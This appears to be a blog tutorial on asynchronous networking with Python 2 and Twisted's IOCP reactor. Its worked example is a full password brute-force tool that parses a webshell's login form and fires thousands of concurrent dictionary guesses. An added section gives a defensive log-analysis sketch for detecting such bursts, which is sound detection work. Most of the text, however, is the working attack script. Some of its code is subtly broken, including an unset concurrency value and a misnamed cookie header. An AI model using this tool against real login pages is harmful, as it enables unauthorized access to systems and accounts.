For a long time I have wanted to learn IOCP on Windows, that is, asynchronous communication. After a lengthy study of other people's C++ versions I found it too esoteric and rather laborious; fortunately, Python's Twisted makes it convenient for me.
IOCP, the asynchronous communication technology, is the most efficient choice on Windows. Asynchronous communication is, as the name implies, the counterpart of synchronous communication. The calls we usually write, such as socket.connect and accept, are synchronous, and Python's urlopen is synchronous as well (why follows from the specific implementation below). In general, most of the socket and HTTP communication code we write is synchronous.
The advantage of a synchronous program is that it is easy to think about and easy to write. The drawback is easy to feel: at connect or receive, the program blocks there and waits a moment before it can move on.
Asynchronous programming is another way of thinking, similar to the SAX approach to XML parsing. In other words, when it reaches a task such as connect or receive, the program first goes on to execute other code; when the network communication has a result, the system notifies you, and execution returns to the place where it was interrupted.
The specific code is below and I will explain it. The techniques it involves are roughly the following:
1. Page parsing. To post webshell passwords automatically, the problem of page parsing has to be solved: how to find the appropriate input elements of the form in the page and submit them, including the values of hidden fields; the password field is filled from a dictionary. The implementation relies on SGMLParser.
2. Normal page requests. I use urlopen (in order to use cookies, an opener is actually used); the fragment is as follows:
    # Python 2 fragment
    import cookielib
    import urllib
    import urllib2

    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    req = urllib2.Request(url, urllib.urlencode(bodyfieleds))
    resp = opener.open(req, timeout=60)
    strlist = resp.read()
The code is simple, which is the charm of Python. bodyfieleds is the parameter part of the POST and is a dictionary.
3. Asynchronous page requests. The Twisted getPage fragment is as follows:
    self.PostData[self.passw] = passl
    #print temp
    zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostData), headers=self.headers)
    zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl)
You can see how to use getPage to pass the POST parameters and the headers (cookies also go inside the headers), as well as how to add custom callback functions and pass them the parameters you need; here I pass the URL and the password.
4. Concurrency. The code is as follows:
    def InitTask(self):
        for passl in self.passlist[:]:
            d = self.addURL(passl)
            yield d

    def DoTask(self):
        deferreds = []
        coop = task.Cooperator()
        work = self.InitTask()
        for i in xrange(self.ThreadNum):
            d = coop.coiterate(work)
            deferreds.append(d)
        dl = defer.DeferredList(deferreds)
That is all. As for efficiency, when my network conditions are good it can send approximately 16,000 packets in 40 s.
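Seen from the server side, the traffic described above is distinctive: one client sends a sustained burst of POSTs to a single URL, and every wrong guess returns the same failure page. The following detection sketch over web access-log records is an added example, not part of the original post; the log rows, thresholds and function names are constructed for illustration.

```python
from collections import Counter, defaultdict, deque


def make_sample():
    """Constructed log rows: (epoch_s, client_ip, method, path, status, body_bytes)."""
    # Burst: one client, 2000 POSTs in 5 s to one URL, identical failure page size.
    rows = [(1000.0 + i * 0.0025, "203.0.113.7", "POST", "/f15.jsp", 200, 1482)
            for i in range(2000)]
    # Ordinary traffic: a few POSTs, seconds apart, with varying response sizes.
    rows += [(1000.0 + i * 7, "198.51.100.4", "POST", "/login", 200, 900 + i)
             for i in range(5)]
    return sorted(rows)


def detect_guessing(rows, window=10.0, min_posts=200, same_size_ratio=0.95):
    """Return {(ip, path): peak POSTs per window} for password-guessing bursts.

    A key is flagged when one client sends at least `min_posts` POSTs to one
    path within `window` seconds and nearly all responses have the same size
    (every wrong guess gets the same failure page).
    """
    recent = defaultdict(deque)   # (ip, path) -> (timestamp, size) pairs in window
    flagged = {}
    for ts, ip, method, path, _status, size in rows:
        if method != "POST":
            continue
        key = (ip, path)
        q = recent[key]
        q.append((ts, size))
        while ts - q[0][0] > window:      # drop entries older than the window
            q.popleft()
        if len(q) < min_posts:
            continue
        top = Counter(s for _, s in q).most_common(1)[0][1]
        if top / len(q) >= same_size_ratio:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged


if __name__ == "__main__":
    for (ip, path), peak in detect_guessing(make_sample()).items():
        print("possible form brute force:", ip, path, "peak POSTs in window:", peak)
```

The same-size test keeps busy but legitimate POST endpoints, whose responses vary, from being flagged on volume alone.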
    # -*- coding: utf-8 -*-
    #coding=utf-8
    #
    # code by icefish
    # http://insight-labs.org/
    # http://wcf1987.iteye.com/
    #
    # Python 2 / Twisted; the IOCP reactor must be installed before
    # twisted.internet.reactor is imported.
    from twisted.internet import iocpreactor
    iocpreactor.install()
    from twisted.web.client import getPage
    from twisted.internet import defer, task
    from twisted.internet import reactor
    import os
    from httplib import HTTPConnection
    import urllib
    import urllib2
    import sys
    import cookielib
    import time
    import threading
    from Queue import LifoQueue
    #import httplib2
    from sgmllib import SGMLParser


    class URLLister(SGMLParser):
        def __init__(self):
            SGMLParser.__init__(self)
            self.input = {}

        def start_input(self, attrs):
            #print attrs
            # An <input> tag may lack any of these attributes.
            type = name = value = None
            for k, v in attrs:
                if k == 'type':
                    type = v
                if k == 'name':
                    name = v
                if k == 'value':
                    value = v
            if type == 'hidden' and value != None:
                self.input[name] = value
            if type == 'password':
                self.input['icekey'] = name


    class WebShellPassScan(object):
        def __init__(self, url, dict):
            self.url = url
            self.ThreadNum = None  # the concurrency value is missing from the source listing
            self.dict = dict

        def getInput(self, url):
            html, c = self.PostURL(url, '')
            parse = URLLister()
            parse.feed(html)
            return parse.input

        def PostURL(self, url, bodyfieleds):
            try:
                cj = cookielib.CookieJar()
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
                req = urllib2.Request(url, urllib.urlencode(bodyfieleds))
                resp = opener.open(req, timeout=60)
                strlist = resp.read()
                cookies = []
                for c in cj:
                    cookies.append(c.name + '=' + c.value)
                return strlist, cookies
            except:
                # Callers unpack two values, so return a pair on failure too.
                return '', []

        def parse_page(self, data, url, passk):
            #print url
            self.TestNum = self.TestNum + 1
            # A response that differs from the baseline failure page ends the run.
            if data != self.sret and len(data) != 0 and data != 'iceerror':
                self.timeend = time.time()
                print 'Scan Password end: ' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeend))
                print 'Total Scan time: ' + str(self.timeend - self.timestart), 's'
                print 'total Scan passwords: ' + str(self.TestNum)
                print "*************************the key pass***************************\n"
                print passk
                print "*************************the key pass***************************\n"
                reactor.stop()
            if self.TestNum % 1000 == 0:
                #print TestNum
                sys.stdout.write('Detect Password Num: ' + str(self.TestNum) + '\n')
                sys.stdout.flush()

        def fetch_error(self, error, url, passl):
            # Re-queue the same password when the request fails.
            self.addURL(passl)

        def run(self):
            self.timestart = 0
            self.timeend = 0
            self.TestNum = 0
            self.sret = ''
            print '\n\ndetect the Webshell URL: ' + self.url
            self.PassNum = 0
            self.timestart = time.time()
            print 'Scan Password Start: ' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timestart))
            filepath = os.path.abspath(os.curdir)
            file = open(filepath + "\\" + self.dict)
            self.passlist = []
            for lines in file:
                self.passlist.append(lines.strip())
                #print lines.strip()
            file.close()
            PassNum = len(self.passlist)
            print 'Get passwords num: ' + str(PassNum)
            inputdic = self.getInput(self.url)
            self.passw = inputdic['icekey']
            del inputdic['icekey']
            self.PostData = dict({self.passw: 'icekey'}, **inputdic)
            # Baseline response for a known-wrong password.
            self.sret, cookies = self.PostURL(self.url, self.PostData)
            self.headers = {'Content-type': 'application/x-www-form-urlencoded'}
            self.headers['cookies'] = cookies
            print 'cookies: ' + str(cookies)
            self.DoTask()
            #self.DoTask2()
            #self.DoTask3()
            print 'start run'
            self.key = 'start'
            reactor.run()

        def InitTask(self):
            for passl in self.passlist[:]:
                d = self.addURL(passl)
                yield d

        def InitTask2(self):
            for passl in self.passlist[:]:
                d = self.sem.run(self.addURL, passl)
                self.deferreds.append(d)

        def InitTask3(self):
            for passl in self.passlist[:]:
                d = self.addURL(passl)
                self.deferreds.append(d)

        def DoTask(self):
            deferreds = []
            coop = task.Cooperator()
            work = self.InitTask()
            for i in xrange(self.ThreadNum):
                d = coop.coiterate(work)
                deferreds.append(d)
            dl = defer.DeferredList(deferreds)
            #dl.addErrback(self.errorCall)
            #dl.addCallback(self.finish)

        def DoTask2(self):
            self.deferreds = []
            self.sem = defer.DeferredSemaphore(self.ThreadNum)
            self.InitTask2()
            dl = defer.DeferredList(self.deferreds)

        def DoTask3(self):
            self.deferreds = []
            self.InitTask3()
            dl = defer.DeferredList(self.deferreds)

        def addURL(self, passl):
            self.PostData[self.passw] = passl
            #print temp
            zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostData), headers=self.headers)
            zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl)
            return zs


    a = WebShellPassScan('http://192.168.0.2:8080/f15.jsp', 'source_new.txt')
    a.run()